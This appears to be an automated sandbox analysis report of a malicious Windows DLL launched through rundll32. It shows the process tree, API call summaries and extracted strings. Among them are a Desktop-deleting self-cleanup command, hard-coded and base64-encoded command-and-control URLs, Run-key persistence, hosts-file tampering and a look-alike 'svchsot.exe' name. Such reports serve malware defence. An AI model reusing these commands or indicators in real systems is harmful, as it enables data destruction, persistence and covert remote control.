                                                                                                                                          Imagebase:0xe10000
                                                                                                                                          File size:18'944 bytes
                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:09:33:17
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,InputFile
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:09:33:20
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,PrintFile
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:09:33:20
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 680
                                                                                                                                          Imagebase:0x170000
                                                                                                                                          File size:483'680 bytes
                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",InputFile
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",PrintFile
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:19
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:20
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:21
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 668
                                                                                                                                          Imagebase:0x170000
                                                                                                                                          File size:483'680 bytes
                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:22
                                                                                                                                          Start time:09:33:23
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
                                                                                                                                          Imagebase:0xe10000
                                                                                                                                          File size:18'944 bytes
                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:25
                                                                                                                                          Start time:09:33:50
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:26
                                                                                                                                          Start time:09:33:51
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:27
                                                                                                                                          Start time:09:33:51
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:28
                                                                                                                                          Start time:09:33:51
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
                                                                                                                                          Imagebase:0xe10000
                                                                                                                                          File size:18'944 bytes
                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:29
                                                                                                                                          Start time:09:33:59
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg
                                                                                                                                          Imagebase:0x580000
                                                                                                                                          File size:61'440 bytes
                                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:30
                                                                                                                                          Start time:09:33:59
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:31
                                                                                                                                          Start time:09:33:59
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:32
                                                                                                                                          Start time:09:33:59
                                                                                                                                          Start date:19/12/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:ping 127.0.0.1 -n 3
                                                                                                                                          Imagebase:0xe10000
                                                                                                                                          File size:18'944 bytes
                                                                                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true


                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:4.5%
                                                                                                                                            Dynamic/Decrypted Code Coverage:99.6%
                                                                                                                                            Signature Coverage:1.2%
                                                                                                                                            Total number of Nodes:251
                                                                                                                                            Total number of Limit Nodes:11

                                                                                                                                            Control-flow Graph

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %s\%s$*.*$.$107.160.131.254:23588/article.php$12010043$L2ltYWdlLnBocA==$NPKI$P
                                                                                                                                            • API String ID: 0-3984435826
                                                                                                                                            • Opcode ID: 0a215aef5ca7b5c606a273fdfbec72fd9b9d822c18bbfb0613fe871d940a9004
                                                                                                                                            • Instruction ID: 154fd83921e69bd95517e48f0429fd4d3315e101fc3602ca34ca7394d0d5f03d
                                                                                                                                            • Opcode Fuzzy Hash: 0a215aef5ca7b5c606a273fdfbec72fd9b9d822c18bbfb0613fe871d940a9004
                                                                                                                                            • Instruction Fuzzy Hash: C371517690425DBEEB61D7A4DC45FEEB7BCEB48240F1004E6F608E6041DB74AB898F61
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000,10005931,00000002,00000000,00000000,00000000), ref: 10003FBF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateSnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3332741929-0
                                                                                                                                            • Opcode ID: 1e956e5b503a472c93e19a4642fd5130f6607d7bc175f230498bf039bbf47dc4
                                                                                                                                            • Instruction ID: ca46abfd3f4ae67059df7024880e3d5c8c44562ed1dec37196b9e10746ab925e
                                                                                                                                            • Opcode Fuzzy Hash: 1e956e5b503a472c93e19a4642fd5130f6607d7bc175f230498bf039bbf47dc4
                                                                                                                                            • Instruction Fuzzy Hash: D5A00136408212ABDA42AB50CD48D4AFFA2BBA8781F02C819F19980034CB32C5A5EB12

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 10006F24
                                                                                                                                            • Sleep.KERNEL32 ref: 10007059
                                                                                                                                            • wsprintfA.USER32 ref: 1000709D
                                                                                                                                            • PrintFile.QCTYOYX422(00000000,?,00000000), ref: 100070D6
                                                                                                                                            • PrintFile.QCTYOYX422(00000000,?,00000000,?,00000000), ref: 100070E9
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FilePrintSleep$wsprintf
                                                                                                                                            • String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.160.131.254:23588/article.php$iOffset
                                                                                                                                            • API String ID: 1547040302-3813294871
                                                                                                                                            • Opcode ID: 6901e9babde4ee68b3136e4664651ea7350d119c703396e769bb1a0f608c4114
                                                                                                                                            • Instruction ID: e128ca64511400ca05deee7795c3814a468ccd3a13c6d035e862ae5cb279fd62
                                                                                                                                            • Opcode Fuzzy Hash: 6901e9babde4ee68b3136e4664651ea7350d119c703396e769bb1a0f608c4114
                                                                                                                                            • Instruction Fuzzy Hash: AC51D9B6D04359E6FB22D764CC56FCF77ACEB083C1F1045A5F208EA086DA75AB808E55

                                                                                                                                            APIs
                                                                                                                                            • wsprintfA.USER32 ref: 100064F7
                                                                                                                                              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 10003F1C
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10006546
                                                                                                                                              • Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,00000000,00000000,10006206), ref: 10003F39
                                                                                                                                              • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,75920ECC,0007D000,00000000,00000000), ref: 100065C8
                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,?,75920ECC,0007D000,00000000,00000000), ref: 100065E6
                                                                                                                                            • wsprintfA.USER32 ref: 100066E9
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
                                                                                                                                            • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==$title
                                                                                                                                            • API String ID: 4077377486-2496724313
                                                                                                                                            • Opcode ID: c3904df0163014b294ad3428c8b46474ddc640335be8714e90fc727204d8a3f7
                                                                                                                                            • Instruction ID: 9bb45785208bde0406de56643d62444fa716b577ceefe44749a59ab2aa42cbd8
                                                                                                                                            • Opcode Fuzzy Hash: c3904df0163014b294ad3428c8b46474ddc640335be8714e90fc727204d8a3f7
                                                                                                                                            • Instruction Fuzzy Hash: 9C81E5B5C05248BEFB01DBA4DC82EEF7B7EEF09394F244059F504A7186DA356E4187A1

                                                                                                                                            APIs
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10005E11
                                                                                                                                              • Part of subcall function 1000409D: RegQueryValueExA.KERNEL32(00000000,?,000F003F,00000000,?,80000002,?,10005E16,?,ProcessorNameString,00000000,00000004,?,?,80000002,?), ref: 100040B2
                                                                                                                                              • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFormatQueryTimeValue___crt
                                                                                                                                            • String ID: %u MB$12010043$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.160.131.254:23588/article.php
                                                                                                                                            • API String ID: 271660946-3893357082
                                                                                                                                            • Opcode ID: 37022121a03464651817a9c0c5e1d81c5aa94c867a3c5e15367f04ef0a505e5e
                                                                                                                                            • Instruction ID: 4f35d1d9e5d3edf0c8f7125bb17b53cb037807f44d0344e2d1e4939474d77481
                                                                                                                                            • Opcode Fuzzy Hash: 37022121a03464651817a9c0c5e1d81c5aa94c867a3c5e15367f04ef0a505e5e
                                                                                                                                            • Instruction Fuzzy Hash: 6531C0B6804208BAFB10C764DC42FDF77BCEB08351F10406AFA18BA082EB75BA458B55

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
                                                                                                                                              • Part of subcall function 1000406C: RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D60,?,10006D60,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
                                                                                                                                            • wsprintfA.USER32 ref: 10006D88
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10006DAE
                                                                                                                                              • Part of subcall function 100040D4: RegSetValueExA.KERNEL32(00000001,?,00000001,00000000,?,?,?,10006DB3,?,dtfd,00000000,00000001,?,00000001,?), ref: 100040E9
                                                                                                                                              • Part of subcall function 10004092: RegCloseKey.KERNEL32(?,10006DBE,?), ref: 10004096
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
                                                                                                                                            • String ID: %s "%s",DoAddToFavDlg$C:\Users\user\Desktop\QCTYoyX422.dll$C:\Windows\SysWOW64\rundll32.exe$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$dtfd
                                                                                                                                            • API String ID: 1762869224-3033863913
                                                                                                                                            • Opcode ID: fe4a6ca71fda934b348afe6d657169d78400bf351d74a23e551a426737a6504a
                                                                                                                                            • Instruction ID: 20d4b35ab7fa00c236079ec8a4dd8982143edab80ee48f6a2419757257224b01
                                                                                                                                            • Opcode Fuzzy Hash: fe4a6ca71fda934b348afe6d657169d78400bf351d74a23e551a426737a6504a
                                                                                                                                            • Instruction Fuzzy Hash: 451160B694415CBEFB11D7A4DC86FEA776CEB14340F1404A1F704FA085DAB16F988AA4

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00080000,00000000,00000000), ref: 10008394
                                                                                                                                            • wsprintfA.USER32 ref: 100083E6
                                                                                                                                            Strings
                                                                                                                                            • 127.0.0.1, xrefs: 100083F4
                                                                                                                                            • http://107.160.131.254:23588/article.php, xrefs: 10008353
                                                                                                                                            • XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082DC
                                                                                                                                            • XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082C5
                                                                                                                                            • 8.8.8.8, xrefs: 100083EF
                                                                                                                                            • Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008405
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleepwsprintf
                                                                                                                                            • String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.160.131.254:23588/article.php
                                                                                                                                            • API String ID: 1749205058-626475063
                                                                                                                                            • Opcode ID: 54eedc971582e05c3486c3a0f88f100d4df9f5038933db9e4620657874ea0a6d
                                                                                                                                            • Instruction ID: 78e0688a60563a7bb1736696f6623559e09cac3deedd02f0104af55f58a5e4a8
                                                                                                                                            • Opcode Fuzzy Hash: 54eedc971582e05c3486c3a0f88f100d4df9f5038933db9e4620657874ea0a6d
                                                                                                                                            • Instruction Fuzzy Hash: 9E4106B6D04258B6F721D364CC46FCF77ACEB457C0F2400A6F248A9086EAB4AB848E51

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B50,?,?,?,00000202,?), ref: 10003EDA
                                                                                                                                            • GetLastError.KERNEL32 ref: 10006AA8
                                                                                                                                              • Part of subcall function 10006499: wsprintfA.USER32 ref: 100064F7
                                                                                                                                              • Part of subcall function 10006499: ___crtGetTimeFormatEx.LIBCMT ref: 10006546
                                                                                                                                            • Sleep.KERNEL32(0002BF20,00000000,00000000,00000000,00000000,000000FF), ref: 10006ADD
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,1000687E,00000000,00000000,00000000), ref: 10006AF1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
                                                                                                                                            • String ID: 0x5d65r455f$5762479093
                                                                                                                                            • API String ID: 3244495550-2446933972
                                                                                                                                            • Opcode ID: 3b97f3ef57c6d34437c21e844b3cc3d0ae84d0d31088cb251ee543bf93b7c76e
                                                                                                                                            • Instruction ID: bd1adab126fe453b34de0ea9e0b5f284958d10fa0a203dc352c1be2a30225ce5
                                                                                                                                            • Opcode Fuzzy Hash: 3b97f3ef57c6d34437c21e844b3cc3d0ae84d0d31088cb251ee543bf93b7c76e
                                                                                                                                            • Instruction Fuzzy Hash: 9701F2A4844228BAF211F3704CCADBF395DDB563D4F200528F915A908BDB24EC0145B3

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00002710), ref: 1000857E
                                                                                                                                            • Sleep.KERNEL32(001B7740,?,00000000,80000002,00000000,00000000,000F003F,?), ref: 100085BF
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$wINsTA0\dEFauLT
                                                                                                                                            • API String ID: 3472027048-3516831565
                                                                                                                                            • Opcode ID: 97b5d75c4eae03a1f54d307b40641d8b725bb66f95620e0adc97901586be56a8
                                                                                                                                            • Instruction ID: 69b21accf233d090089117fd856bc82e5cd65d02c06b2ff4ec7ccf08b8a7457c
                                                                                                                                            • Opcode Fuzzy Hash: 97b5d75c4eae03a1f54d307b40641d8b725bb66f95620e0adc97901586be56a8
                                                                                                                                            • Instruction Fuzzy Hash: 6421817680525CBAEB11EBE4CC46EDFBB7CEF08390F1400A9F604BB151DB765A458B91

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,00000000,GetExtendedUdpTable,?,iphlpapi.dll), ref: 100044E9
                                                                                                                                            • GetExtendedUdpTable.IPHLPAPI(?,?,00000001,00000002,00000001,00000000,?,00000000,GetExtendedUdpTable,?,iphlpapi.dll), ref: 10004513
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExtendedTable
                                                                                                                                            • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                                                                                                            • API String ID: 2407854163-1809394930
                                                                                                                                            • Opcode ID: 8f3a0eb883154a3195ca5da507f2da972492a258440e1d6e2132d319b0eaf8e7
                                                                                                                                            • Instruction ID: 6449560a486cb6172ee975f2d37c1f40bf8993c7a1880d61e14318031523e361
                                                                                                                                            • Opcode Fuzzy Hash: 8f3a0eb883154a3195ca5da507f2da972492a258440e1d6e2132d319b0eaf8e7
                                                                                                                                            • Instruction Fuzzy Hash: D1215CB5500508BFEB20DB69DC46EAF77BCDF813D1F214519F9119A086DE30AE808674

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(?,00000800,?,?,?,svchsot.exe,?,?,?,?,00000000,?,?,?), ref: 1000855C
                                                                                                                                            Strings
                                                                                                                                            • U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 1000846F
                                                                                                                                            • svchsot.exe, xrefs: 10008524
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: U09GVFdBUkVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$svchsot.exe
                                                                                                                                            • API String ID: 3472027048-2214221337
                                                                                                                                            • Opcode ID: d2131fb9256a9d085b7213a385e4fb7e2e0d0505dace0aeb26e32ec0842a8d4a
                                                                                                                                            • Instruction ID: e8defaa02cb337ec462540d7064ad22b690c993f3d196736069eab589a90189d
                                                                                                                                            • Opcode Fuzzy Hash: d2131fb9256a9d085b7213a385e4fb7e2e0d0505dace0aeb26e32ec0842a8d4a
                                                                                                                                            • Instruction Fuzzy Hash: EE314D7290015DBEEB01DBA4CD81DEFB7FDFB48284F1440A6F644E6105EA30AF858BA1

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 490 100087b6-100087ea CreateThread Sleep CreateThread Sleep 492 100087eb-100087f2 490->492
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(?,?,Function_00006A6E), ref: 100087D1
